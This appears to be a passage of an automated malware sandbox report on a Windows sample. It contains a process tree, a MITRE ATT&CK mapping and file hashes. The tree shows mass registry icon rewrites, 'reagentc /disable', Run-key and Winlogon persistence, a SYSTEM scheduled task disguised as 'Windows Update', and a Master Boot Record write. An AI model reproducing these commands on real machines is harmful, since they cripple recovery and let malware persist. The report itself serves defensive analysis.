C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 150 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\java\protection\start\starticons.exeC:\java\protection\start\starticons.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\53BF.tmp\53C0.tmp\53D0.bat C:\java\protection\start\starticons.exe"8⤵
-
C:\java\protection\icons.exeC:\java\protection\icons.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5AE3.tmp\5AE4.tmp\5AE5.bat C:\java\protection\icons.exe"10⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies system executable filetype association
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\batfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies system executable filetype association
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\blendfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\dllfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\AutoHotkeyScript\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\pngfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\jpegfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\giffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\bittorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\cmdfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\dbfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Drive\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\DVD\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\docxfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\http\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Folder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\https\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\icofile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\mscfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-excel\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-publisher\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-word\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-access\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\MSInfoFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Python.File\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\regfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\steamlink\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\steam\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\4.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\svgfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\themefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\themepackfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\xmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\WinRAR\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Windows.VhdFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\SearchFolder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\inffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\JSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\JSEFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ftp\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Word.Document.12\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Word.RTF.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordhtmltemplate\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordmhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Wordpad.Document.1\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\uTorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\ie4uinit.exeie4uinit.exe -show11⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\ie4uinit.exeie4uinit.exe -show7⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\java\protection\start\starthosts.exeC:\java\protection\start\starthosts.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\59F8.tmp\59F9.tmp\59FA.bat C:\java\protection\start\starthosts.exe"8⤵
-
C:\java\ban\hosts.exeC:\java\ban\hosts.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D92.tmp\5D93.tmp\5D94.bat C:\java\ban\hosts.exe"10⤵
- Drops file in Drivers directory
-
C:\java\protection\start\startWPChanger.exeC:\java\protection\start\startWPChanger.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C99.tmp\5C99.tmp\5C9A.bat C:\java\protection\start\startWPChanger.exe"8⤵
-
C:\java\Wallpaper\WPChanger.exeC:\java\Wallpaper\WPChanger.exe C:\java\Wallpaper\clown.png9⤵
- Sets desktop wallpaper using registry
- Executes dropped EXE
- Modifies Control Panel
-
C:\java\clown.exeC:\java\clown.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C98.tmp\5C99.tmp\5C9A.bat C:\java\clown.exe"8⤵
-
C:\java\protection\start\startvol.exeC:\java\protection\start\startvol.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E9C.tmp\5E9D.tmp\5E9E.bat C:\java\protection\start\startvol.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\java\vol.exeC:\java\vol.exe11⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\61C8.tmp\61C9.tmp\61CA.bat C:\java\vol.exe"12⤵
-
C:\Windows\system32\wscript.exewscript.exe "C:\java\vol.vbs"13⤵
-
C:\Windows\system32\wscript.exewscript.exe "C:\java\morgalka.vbs"13⤵
-
C:\java\protection\start\startScreenBlocker.exeC:\java\protection\start\startScreenBlocker.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F96.tmp\5FA7.tmp\5FA8.bat C:\java\protection\start\startScreenBlocker.exe"10⤵
-
C:\java\ban\ScreenBlocker.exeC:\java\ban\ScreenBlocker.exe11⤵
- Executes dropped EXE
-
C:\java\protection\start\startcur.exeC:\java\protection\start\startcur.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6013.tmp\6014.tmp\6015.bat C:\java\protection\start\startcur.exe"10⤵
-
C:\java\ban\cur.exeC:\java\ban\cur.exe11⤵
- Executes dropped EXE
-
C:\java\attention.exeC:\java\attention.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6023.tmp\6024.tmp\6025.bat C:\java\attention.exe"10⤵
-
C:\java\form.exeC:\java\form.exe11⤵
- Executes dropped EXE
-
C:\Windows\system32\timeout.exetimeout -t 10 -nobreak11⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im form.exe11⤵
- Kills process with taskkill
-
C:\Windows\system32\ReAgentc.exereagentc /disable9⤵
- Drops file in Windows directory
-
C:\java\protection\start\startWinlog.exeC:\java\protection\start\startWinlog.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\633F.tmp\6340.tmp\6341.bat C:\java\protection\start\startWinlog.exe"10⤵
-
C:\java\protection\Winlog.exeC:\java\protection\Winlog.exe11⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
-
C:\java\protection\start\startf.exeC:\java\protection\start\startf.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\635F.tmp\6360.tmp\6361.bat C:\java\protection\start\startf.exe"10⤵
-
C:\java\f\f.exeC:\java\f\f.exe11⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6785.tmp\6786.tmp\6787.bat C:\java\f\f.exe"12⤵
-
C:\java\protection\start\startban.exeC:\java\protection\start\startban.exe9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\634F.tmp\6350.tmp\6351.bat C:\java\protection\start\startban.exe"10⤵
-
C:\java\ban\ban.exeC:\java\ban\ban.exe11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\ban\ban.exeC:\java\ban\ban.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\java\Wallpaper\engine\wp.exewp id9⤵
- Suspicious use of SetWindowsHookEx
-
C:\java\Wallpaper\engine\wp.exewp run mpv --wid=132016 C:\java\Wallpaper\engine\wallpapers\1.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes9⤵
- Checks computer location settings
-
C:\java\Wallpaper\engine\mpv.com"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"10⤵
-
C:\java\Wallpaper\engine\mpv.exe"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 20 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 20 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 20 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 13 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\java\video\VideoPlayer.exeC:\java\video\VideoPlayer.exe C:\java\video\1.mp49⤵
- Enumerates connected drives
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskkill.exetaskkill /F /IM VideoPlayer.exe9⤵
- Kills process with taskkill
-
C:\java\Wallpaper\engine\wp.exewp run mpv --wid=132016 C:\java\Wallpaper\engine\wallpapers\2.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes9⤵
-
C:\java\Wallpaper\engine\mpv.com"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"10⤵
-
C:\java\Wallpaper\engine\mpv.exe"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\java\hide.exeC:\java\hide.exe9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 22 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\java\video\VideoPlayer.exeC:\java\video\VideoPlayer.exe C:\java\video\2.mp49⤵
- Enumerates connected drives
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskkill.exetaskkill /F /IM VideoPlayer.exe9⤵
- Kills process with taskkill
-
C:\java\Wallpaper\engine\wp.exewp id9⤵
-
C:\java\Wallpaper\engine\wp.exewp run mpv --wid=132016 C:\java\Wallpaper\engine\wallpapers\3.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes9⤵
- Checks computer location settings
-
C:\java\Wallpaper\engine\mpv.com"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\3.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"10⤵
-
C:\java\Wallpaper\engine\mpv.exe"C:\java\Wallpaper\engine\mpv.com" "--wid=132016" "C:\java\Wallpaper\engine\wallpapers\3.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout -t 42 -nobreak9⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.exe9⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill -f -im mpv.com9⤵
- Kills process with taskkill
-
C:\java\video\VideoPlayer.exeC:\java\video\VideoPlayer.exe C:\java\video\3.mp49⤵
- Enumerates connected drives
- Loads dropped DLL
-
C:\java\f.exeC:\java\f.exe9⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\java\f.exe"C:\java\f.exe"10⤵
-
C:\java\f.exe"C:\java\f.exe"10⤵
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\java\f.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 50411⤵
- Program crash
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f8 0x4081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3576 -ip 35761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6600 -ip 66001⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4Registry Run Keys / Startup Folder
3Winlogon Helper DLL
1Event Triggered Execution
1Change Default File Association
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
4Registry Run Keys / Startup Folder
3Winlogon Helper DLL
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
8Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
210KB
MD5aa5ac583708ca35225ac2d230f4acb62
SHA145bb287f6463b6ffbba91bfbece28e02e1c8b07b
SHA25608df40e8f528ed283b0e480ba4bcdbfdd2fdcf695a7ada1668243072d80f8b6f
SHA51291266bcf97d879828c26beba82e15ff73aa676d800e11401da22b0a565e980912222e02e9a9cc7daff7ceddf78309d8fb0adef6a4eaff9cefa73b72a97281bc2
-
Filesize
5.5MB
MD528126f24bc9e051aa9667482e597708c
SHA1c8d0bd1338c4cb5a4e7ab09cffa08987ab1031e1
SHA256bdc0528f7532a7c5158a039fe771c74e55f3b9672ecaa872a67bbe4d5d96fb77
SHA5120839c3c2c2536f56c095bb831e0abc00a76a00dde102f19c296040e8a375e16476885edf2d181928f5f91d2c2fbd0d24dffdc1597438cbfcab0586eb5e514a56
-
Filesize
86KB
MD554a4c63c672cf6f2924076bd007b355b
SHA106f70d5bc1f347b0102e5973b932827b8cb18f4c
SHA256664c0d68341d7bb581fc78d534fdb2c31d465829a847094c4f2ad6adfa03b030
SHA51234a847b6dcb6ebf2f17cc8c0be8bd160d8693732bf8112612cf5e54e1ad1a794e61b64619f154e37959a1cb0f238705bd63dc078eb7edfe3e04e5c1a81d52a6e
-
Filesize
1.6MB
MD59bf5933e386f5494900af2953d2cd2a9
SHA1854bfe019cc440de59eb4362261df36996014abd
SHA256c7c67fd318fb07d4c36e48e675327e2a4162e8cb9287dae1c4ff7d945a240fe7
SHA5123b1dff1fe1f82a9940beac28a65faa99b84e8b7bf20a8cb598560d5156f8a2eccb2bdd851ae06ac9e3e6da14fc7973de63a69c8e3294a1fcb08af377ea0da4b4
-
Filesize
463KB
MD5720b2efbdb1dc6bac0e3fe56e75d47b3
SHA1d6a607cf172d5807be09a75fb3a4de9a9cbbeaf5
SHA2564a320727a2adddee00dc66ab06e5b330184ddfbf0899a0763b63aa65621f3879
SHA512fff08803a2508a0569ed146285526dd900a4120a346badba7b34089143330dba168cb7f32dee153b1ccea967c6fcd24fb459ff6908e48fdf2ae619996108afb2
-
Filesize
515B
MD5b67920d8fe0550bcced605a773b8fae2
SHA1c14d2efd2d0240a640e0f59c754e062eb17f2428
SHA2566d23c8978d94c62f6c406325ebf4be8de717706c8194b994ad6c346ecc8495e3
SHA512805364c32abdf1edb59023f8337fbfbab7458d1279bdb535a734f192e486336a7180ca98be5674b4f4d4156a6cc759ffe5cd7ac92034d8f603674560e33df5e6
-
Filesize
207B
MD5ffce305293b2b7dc67acf5deb757167c
SHA1619a667fd9eb44e0dc288df64083a01ef397ba05
SHA256614a11e8b373c558365abeea6ca1e20b106ab38e822e20906fcc888ec9e99ddd
SHA51223ba224c2c5bef6fb04e108dc687ba934d08a426a82d851636656dd488f441a6a543ed5867024e8338c46c3da0de1d170cfb338e615d2f840051cbced9864068
-
Filesize
2KB
MD50f186e94e9b99a5e2e31c2dc955346cc
SHA1ffd9997b2db8c39f410f5d2a9f3d080f8d7523b7
SHA256bf171a0e53a7acb766fd4f462f516bc2bab3dbc6e12b7b2423af5bae8be1fdf4
SHA512530ea4c1e9fd6799cbb1be4f7278d4e9ce23875898164dc42650e62e8b37cd886cfa0174310541736487e58ca691a83b1079aa8780ebb7491de8da65c3433488
-
Filesize
896KB
MD54d3d6908b9958d6c62fc33842d7d8f65
SHA1c8e47461587a73dfdc2354fdca2cbd53923ec662
SHA2568ba73be7c049a699e46636077d9878e7a66b4dc719b18f173aed32aa98c53315
SHA51259b5dc0080c17d9379f6efd8a6c73a342eb5603a41cf0c9957baee214afccf3c7c0593b41f3a28b39012b0d53bc61031d46b714c8ea4fd5e1f246912826d8eee
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
24KB
MD599e75e41d0a0103d80afd49a9e39de25
SHA16e6210e008ce01c0889ba155593d29171441169d
SHA2562712b72a60cf19419ab5ce4e472695ec2161384fbe866dd48f3b92eaa93f07df
SHA5128b4435bdced097fd2e7acfa99b6d7402d85a3942220924c5d81347bed12bac3734af3c2dc11a5c9476e50d7ede403e065ae6b8534c5b4fecca7f327a355f6aa8
-
Filesize
11KB
MD5bd5a949fe208c69255a17ccca9a2f4ec
SHA1245a711db45bf00d8a10e1ffa6d19ffa5e318cf5
SHA2568db08e9fcbe5db7a59c6b7ed985ba3eacd9c8fdb675d555c1262d238dc18c146
SHA512877725465eda4175377ac1219e2e9370279c8ce41d8552e4a70d02dcc35e7772ca1e7a6b43af4537b2ebb1eaee4bb9d98acbd3f336ccccbfc629ee3b42fed4c1
-
Filesize
16KB
MD5d648c278e0dc6c45944c9a4b6a9b3304
SHA1a72625539f58df13a8650f330b55e45692535699
SHA256312dbbd4bc680c2b1db9db4e5d4eb02e4f86121337ff6b8ada304ee74b4416f3
SHA5124bb598269ce9bf50b0e58f0546a841b86402c39d0c60507b39d416f78693187c895df0ed89c77f492224f380c5a84f8069f3b7cc4e1ea49b31585f14175148f3
-
Filesize
16KB
MD523c820244c858c2da759a7a0d2ab8cba
SHA1567e2ef429cf0adca52e918069ded5fb7d4651c7
SHA256ad1c798196d17537007598542b28fb19dde8110632b82d382de71f6564b00c36
SHA5126c186a400f179f2f84aed9ac6832b27de6e99520b5316ad57ad34384d9f00ff3673c307a5075906bcb2ae381afd2bb69cea9a5a088fb64b695c811847d0718c5
-
Filesize
16KB
MD5175148f3aff459179bb92f378fe01471
